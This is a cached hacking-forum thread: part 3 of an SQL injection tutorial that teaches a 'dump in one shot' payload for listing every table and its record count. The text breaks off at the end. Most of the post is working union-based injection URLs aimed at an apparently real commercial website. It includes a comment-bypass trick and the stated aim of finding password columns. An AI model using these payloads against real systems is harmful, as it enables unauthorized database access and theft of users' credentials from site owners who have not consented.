<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=3567217" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=3567217" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=3567217</a>. It is a snapshot of the page as it appeared on 7 Feb 2014 02:49:25 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=3567217" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:M1ybgS7uXbEJ:www.hackforums.net/showthread.php%3Ftid%3D3567217&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[SQLi Tutorial] playing with "dump in one shot" syntax - part #3 - Page 1</title> <meta name="description" content="SQL Injection Attacks-[SQLi Tutorial] playing with &quot;dump in one shot&quot; syntax - part #3"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=3567217"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 02-06-2014, 07:49 PM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[SQLi Tutorial] playing with "dump in one shot" syntax - part #3</span></div><br><div class="quick_keys"><div class="float_left"><div class="pagination"><span class="pages">Pages (2):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=3567217&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=3567217&amp;page=2" class="pagination_next">Next »</a></div></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=3567217" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/rating.js"></script><div id="success_rating_3567217" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_3567217"><li style="width: 0%" class="current_rating" id="current_rating_3567217">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=3567217&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3567217&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3567217&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3567217&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3567217&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_3567217" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_3567217_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=3567217" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3567217&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_3567217");
// -->
</script><div><strong>[SQLi Tutorial] playing with "dump in one shot" syntax - part #3</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid33441753" id="pid33441753"></a><table class="tborder" style="border-top-width: 0; " id="post_33441753" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-21-2013, 02:00 PM <span id="edited_by_33441753"><span class="smalltext">(This post was last modified: 02-04-2014 04:47 PM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3567217&amp;pid=33441753#pid33441753">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 130<br>Posts: 2,116<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">192</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33441753">This is part <span style="color: #32CD32;"><span style="font-size: medium;">3</span></span> of <span style="color: #32CD32;"><span style="font-size: medium;">4</span></span> of tutorial <span style="font-weight: bold;"><span style="color: #00BFFF;"><span style="font-size: medium;">Playing with "dump in one shot" syntax</span></span></span><br><br>In <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">part #1 of this tutorial</span></a> we learned how to compose complex command and how to use syntax "dump in one shot" to overcome <span style="color: #00BFFF;">group_concat</span> limit of 1024 characters.<br><br>In <a href="http://www.hackforums.net/showthread.php?tid=3532481" target="_blank"><span style="text-decoration: underline;">part #2</span></a> we learned how to display total number of databases, total number of tables, all table names and columns count for each table.<br><br>In
 this part #3 I will explain how to compose SQLi command which will give
 us number of records for each table in database. It is related to my <a href="http://www.hackforums.net/showthread.php?tid=3525425" target="_blank"><span style="text-decoration: underline;">challenge #49</span></a><br><br>If you follow my challenges (<a href="http://www.hackforums.net/showthread.php?tid=3470469" target="_blank">#45</a>, <a href="http://www.hackforums.net/showthread.php?tid=3480082" target="_blank">#46</a>, <a href="http://www.hackforums.net/showthread.php?tid=3525425" target="_blank">#49</a>, <a href="http://www.hackforums.net/showthread.php?tid=3562988" target="_blank">#50</a>) you can guess where are we going. We are building complex SQLi command which will give us <span style="color: #FFD700;">total statistics</span>:<br><br>- number of databases<br>- list all databases<br>- number of tables in each database<br>- list all tables in each database<br>- number of columns in each table<br>- list all columns in each table<br>- number of records in each table<br>- mark all tables where column name include letters <span style="color: #32CD32;">pass </span>(searching for passwords)<br><br>Such
 command we will simply copy to vulnerable place and result will be 
everything we want to know at every SQL injection (databases, tables in 
databases, columns in all tables, in which table is column with 
passwords... All that with just one command <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br><br>As I already said this tutorial is related to <span style="font-weight: bold;"><a href="http://www.hackforums.net/showthread.php?tid=3525425" target="_blank"><span style="text-decoration: underline;">challenge #49</span></a></span> where task was:<br><span style="font-weight: bold;"><span style="color: #FFD700;">A</span></span> - display version with your name<br><span style="font-weight: bold;"><span style="color: #32CD32;">B</span></span> - display all tables in primary database with records count for each table<br><br>Based on that we already know we will have to concatenate two parts (<span style="color: #FFD700;">A</span> and <span style="color: #32CD32;">B</span> using function <span style="color: #FFD700;">concat()</span> so our command which will be injected at vulnerable column will be something like<br><br>concat(<span style="color: #FFD700;">A</span>, <span style="color: #32CD32;">B</span>)<br><br>For easier reading we will build our command step by step (see explanation for parts <span style="font-weight: bold;"><span style="color: #FFD700;">A</span></span> and <span style="font-weight: bold;"><span style="color: #32CD32;">B</span></span> bellow). Because our syntax will be quite long and maybe complex for someone I will write it like:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>concat<br>&nbsp;&nbsp;(<br>&nbsp;&nbsp;&nbsp;&nbsp;A,<br>&nbsp;&nbsp;&nbsp;&nbsp;B<br>&nbsp;&nbsp;)</code></div></div><br>We will replace step by step <span style="font-weight: bold;"><span style="color: #FFD700;">A</span></span> and <span style="font-weight: bold;"><span style="color: #32CD32;">B</span></span> parts with our commands.<br><br><hr><br><span style="font-weight: bold;"><span style="font-size: medium;"><span style="color: #FFD700;">Columns count</span></span></span><br>Let's start with finding columns count. We need that info for our <span style="color: #32CD32;">union select</span> based SQLi.<br><br>When we tested site for SQLi vulnerability by adding <span style="font-weight: bold;"><span style="color: #32CD32;">'</span></span> after id parameter:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.comforthomesolution.com/product.php?c=11'</code></div></div><br>we get an error:<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/0467b254e1213d5d5ca6d7954c4a96f8.jpg" alt="[Image: 0467b254e1213d5d5ca6d7954c4a96f8.jpg]" border="0"><br><br>Form
 that error we see our injection point is right before ORDER BY command.
 That is why we will use command GROUP BY to test for columns count. 
After command:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.comforthomesolution.com/product.php?c=11 group by 1-- -</code></div></div><br><br>we get an error:<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/158c1fc9f3cc87349d623879dcd957a0.jpg" alt="[Image: 158c1fc9f3cc87349d623879dcd957a0.jpg]" border="0"><br><br>If you follow my tutorial about <a href="http://www.hackforums.net/showthread.php?tid=2853082" target="_blank"><span style="text-decoration: underline;">importance of learning from error response </span></a>than you already know <span style="color: #00BFFF;">you should analyze error response character by character</span>. Quickly we see somebody added <span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #FFD700;">)</span></span></span> after our command <span style="color: #32CD32;">group by 1-- -</span>:<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/6d71e6b8b2ec3f30dcee28f104ecf01c.jpg" alt="[Image: 6d71e6b8b2ec3f30dcee28f104ecf01c.jpg]" border="0"><br><br>Who added it if we didn't? <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/confused.gif" style="vertical-align: middle;" alt="Confused" title="Confused" border="0"> Obviously server. It add it if <span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #FFD700;">)</span></span></span> is not already there. Let's test that and "help" server with adding <span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #FFD700;">)</span></span></span> after id parameter like:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.comforthomesolution.com/product.php?c=11) group by 1-- -</code></div></div><br>and error is gone <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"> OK, from here it is easy to find proper columns count. Following my tutorial <a href="http://www.hackforums.net/showthread.php?tid=2698410" target="_blank"><span style="text-decoration: underline;">how to quickly find out columns count</span> </a>we copy/paste<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>group by<br>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
​
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5
​7,58,59,60,61,62,63,64,65,66,67,68,69,70,100,200,400-- -</code></div></div><br><br>to our command:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.comforthomesolution.com/product.php?c=11) group by<br>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
​
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5
​7,58,59,60,61,62,63,64,65,66,67,68,69,70,100,200,400-- -</code></div></div><br>and we get error response: <span style="color: #FF4500;">Unknown column '9' in 'group statement'</span>. Now we know there are <span style="color: #32CD32;">8 columns</span>. All in just one command execution after we copy/pasted those numbers.<br><br>Let's compose our union select command:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.comforthomesolution.com/product.php?c=11) and 0 union select 1,2,3,4,5,6,7,8-- -</code></div></div><br>We get error: <span style="color: #FF4500;">Unknown column 'c.cat_id' in 'order clause'</span><br><br>Hmm <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/confused.gif" style="vertical-align: middle;" alt="Confused" title="Confused" border="0"><br><br>Same column was reported in error when we added ' after id parameter. What if <span style="color: #FFD700;">-- -</span> doesn't comment out the rest of the query after our injection? Let's replace <span style="color: #FFD700;">-- -</span> with <span style="color: #FFD700;">%23</span>. Same error. Let's replace <span style="color: #FFD700;">%23</span> with <span style="font-weight: bold;"><span style="color: #32CD32;">`</span></span> (<span style="color: #32CD32;">%60</span>) like:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.comforthomesolution.com/product.php?c=11) and 0 union select 1,2,3,4,5,6,7,8`</code></div></div><br>Bingo <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"> Backtick <span style="font-weight: bold;"><span style="color: #32CD32;">`</span></span> (<span style="color: #32CD32;">%60</span>) successfully comment out rest of the query after our injection and we get vulnerable columns <span style="font-weight: bold;"><span style="color: #FFA500;">2</span></span> and <span style="font-weight: bold;"><span style="color: #FFA500;">4</span></span> to screen:<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/f9f79c31af21e333a10b9c0eb83bfdc7.jpg" alt="[Image: f9f79c31af21e333a10b9c0eb83bfdc7.jpg]" border="0"><br><br><hr><br><span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #FFD700;">part A</span></span></span><br><br>We will inject in column #2. Displaying <a href="http://www.hackforums.net/showthread.php?tid=2936630&amp;pid=27270274#pid27270274" target="_blank"><span style="text-decoration: underline;">version with our name is easy (see here)</span></a>.<br><br>Concat for part <span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #FFD700;">A</span></span></span> will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>concat<br>&nbsp;&nbsp;(<br>&nbsp;&nbsp;&nbsp;&nbsp;version(), :: ajkaro (or your name),<br>&nbsp;&nbsp;&nbsp;&nbsp;B&nbsp;&nbsp;<br>&nbsp;&nbsp;)</code></div></div><br>All parts except version() should be converted to hex so working command will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.comforthomesolution.com/product.php?c=11) and 0 UNION SELECT 1,concat(version(),0x203a3a20616a6b61726f),3,4,5,6,7,8`</code></div></div>and we can nicely see version with our name on web page.<br><br><span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #32CD32;">part B</span></span></span><br><br>In part <span style="font-weight: bold;"><span style="color: #32CD32;">B</span></span> we need all tables in database() with records count for each table.<br><br>Our concat command will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>concat<br>&nbsp;&nbsp;(<br>&nbsp;&nbsp;&nbsp;&nbsp;version(), :: ajkaro (or your name),<br>&nbsp;&nbsp;&nbsp;&nbsp;&lt;BR&gt;, "dump in one shot syntax"<br>&nbsp;&nbsp;)</code></div></div><br>From <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">first part</span></a> and from <a href="http://www.hackforums.net/showthread.php?tid=3532481" target="_blank"><span style="text-decoration: underline;">second part</span></a> of this tutorial we already know how to use "<span style="color: #FFD700;">dump in one shot syntax</span>" which will give us all tables in database():<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)<br>where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x)</code></div></div><br>so our command built so far will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.comforthomesolution.com/product.php?c=11)<br>and 0 UNION SELECT 1,<br>concat<br>(<br>&nbsp;&nbsp;version(),0x203a3a20616a6b61726f,<br>&nbsp;&nbsp;(select
 (@x) from (select (@x:=0x00),(select (0) from 
(information_schema.tables) where (table_schema=database()) and (0x00) 
in (@x:=concat(@x,0x3c62723e,table_name))))x)<br>)<br>,3,4,5,6,7,8`</code></div></div><br><span style="font-weight: bold;"><span style="color: #FF0000;">Here comes the hardest part. </span></span>How to add records count to that? We know we can get records count using:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>SELECT COUNT(*) FROM table_name</code></div></div>But using syntax "<span style="color: #00BFFF;">dump in one shot</span>" when iterating from first to last table in database we should replace table_name each time with different table name!!! <span style="color: #FFD700;">How to do that?</span><br><br>We will introduce local variable for example with name <span style="font-weight: bold;"><span style="color: #32CD32;">tbl</span></span>. Lets modify our command and add that local variable. We will assign table_name to it with <span style="font-weight: bold;"><span style="color: #32CD32;">@tbl:=table_name</span></span> like:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.comforthomesolution.com/product.php?c=11)<br>and 0 UNION SELECT 1,<br>concat<br>(<br>&nbsp;&nbsp;version(),0x203a3a20616a6b61726f,<br>&nbsp;&nbsp;(select
 (@x) from (select (@x:=0x00),(select (0) from 
(information_schema.tables) where (table_schema=database()) and (0x00) 
in (@x:=concat(@x, 0x3c62723e, @tbl:=table_name))))x)<br>)<br>,3,4,5,6,7,8`</code></div></div><br>After executing this command we get same result as with command one step back (without local variable <span style="font-weight: bold;"><span style="color: #32CD32;">tbl</span></span>).
 By doing this we successfully assign new table name to local variable 
in each iteration. Let's use that local variable in command for getting 
records count:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>(SELECT COUNT(*) FROM @tbl)</code></div></div><br>After adding that part to our command:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.comforthomesolution.com/product.php?c=11)<br>and 0 UNION SELECT 1,<br>concat<br>(<br>&nbsp;&nbsp;version(),0x203a3a20616a6b61726f,<br>&nbsp;&nbsp;(select
 (@x) from (select (@x:=0x00),(select (0) from 
(information_schema.tables) where (table_schema=database()) and (0x00) 
in (@x:=concat(@x, 0x3c62723e, @tbl:=table_name, (SELECT COUNT(*) FROM 
@tbl))x)<br>)<br>,3,4,5,6,7,8`</code></div></div><br>we can see <span style="font-weight: bold;"><span style="color: #FF0000;">it doesn't work</span></span>. Obviously we can't use local variable with <span style="color: #FFD700;">FROM </span>command (at least I didn't find a way to use it).<br><br>Let's try alternative approach. Let's define table name in each iteration with code:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>WHERE table_name=@tbl</code></div></div>In <span style="color: #00BFFF;">information_schema.tables</span> we can find information about tables in databases and one information relevant for our need is <span style="color: #32CD32;">table_rows</span>. Instead of count(*) we will use <span style="font-weight: bold;"><span style="color: #32CD32;">table_rows</span></span>.<br><br>Our command to get records count will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>(select table_rows from information_schema.tables where table_schema=Database() and table_name=@tbl)</code></div></div><br>For better display we will add some label before records count result like <span style="color: #32CD32;">--&gt; records in table: </span>(in hex = <span style="color: #FFD700;">0x</span><span style="color: #32CD32;">202d2d3e207265636f72647320696e207461626c653a20</span>):<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.comforthomesolution.com/product.php?c=11) and 0 UNION SELECT 1,<br>concat<br>(<br>&nbsp;&nbsp;version(),0x203a3a20616a6b61726f,<br>&nbsp;&nbsp;(select
 (@x) from (select (@x:=0x00),(select (0) from 
(information_schema.tables) where (table_schema=database()) and (0x00) 
in<br>&nbsp;&nbsp;(@x:=concat(@x,0x3c62723e,@tbl:=table_name, 0x202d2d3e207265636f72647320696e207461626c653a20,<br>&nbsp;&nbsp;(select table_rows from information_schema.tables where table_schema=Database() and table_name=@tbl))x)<br>),3,4,5,6,7,8`</code></div></div><br>Bingo. <span style="color: #32CD32;">It works.</span> Challenge #49 solved <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br>If we add some colors and font manipulation (see <a href="http://www.hackforums.net/showthread.php?tid=2798495" target="_blank"><span style="text-decoration: underline;">tutorial here</span></a>) result can be nicer:<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/1826d74b11237ad76de35aad242f2e88.jpg" alt="[Image: 1826d74b11237ad76de35aad242f2e88.jpg]" border="0"><br><br>If we join knowledge from <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">part #1</span></a> and from <a href="http://www.hackforums.net/showthread.php?tid=3532481" target="_blank"><span style="text-decoration: underline;">part #2</span></a> of this tutorial we can get all possible information:<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/1573e49aa19490e486bb804df6cd930a.jpg" alt="[Image: 